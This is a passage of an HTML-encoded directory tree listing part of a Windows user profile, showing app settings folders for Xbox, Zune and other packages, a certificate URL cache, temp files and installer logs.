&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; ESE
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Microsoft
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; CryptnetUrlCache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Content
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 57C8EDB95DF3F0AD4EE2DC2B8CFD4157
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 77EC63BDA74BD0D0E0426DC8F8008506
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; B398B80134F72209547439DB21AB308D_9F6005AF34C7906F717D420F892FD6D0
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; FB0D848F74F70BB2EAA93746D24D9749
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; MetaData
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; 57C8EDB95DF3F0AD4EE2DC2B8CFD4157
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; 77EC63BDA74BD0D0E0426DC8F8008506
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; B398B80134F72209547439DB21AB308D_9F6005AF34C7906F717D420F892FD6D0
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9492;&#9472;&#9472; FB0D848F74F70BB2EAA93746D24D9749
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Windows.XGpuEjectDialog_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.XboxApp_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.XboxGameCallableUI_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.XboxGameOverlay_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LocalState
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; DiagOutputDir
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; LogFile_August_15_2025__3_0_33.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; LogFile_August_20_2025__9_52_55.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.XboxGamingOverlay_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.XboxIdentityProvider_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Xbox.TCUI_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.YourPhone_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.ZuneMusic_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.ZuneVideo_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; NcsiUwpApp_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Windows.CBSPreview_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; windows.immersivecontrolpanel_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Windows.PrintDialog_cw5n1h2txyewy
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Temp
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 18e190413af045db88dfbd29609eb877.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 18e190413af045db88dfbd29609eb877.db.session64
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; ListSync
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Common
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Microsoft.ListSync.Thumbnails.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; msedge_installer.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; offline
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; offline.session64
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; wct1A9D.tmp
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; wct3307.tmp
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; wct367F.tmp
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; wct370B.tmp
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; wct62B3.tmp
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; wct68FC.tmp
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; wct941B.tmp
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; wctAC24.tmp
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; wctD681.tmp
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; wmsetup.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Roaming
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Microsoft
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; Internet Explorer
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Quick Launch
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft Edge.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; User Pinned
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; TaskBar
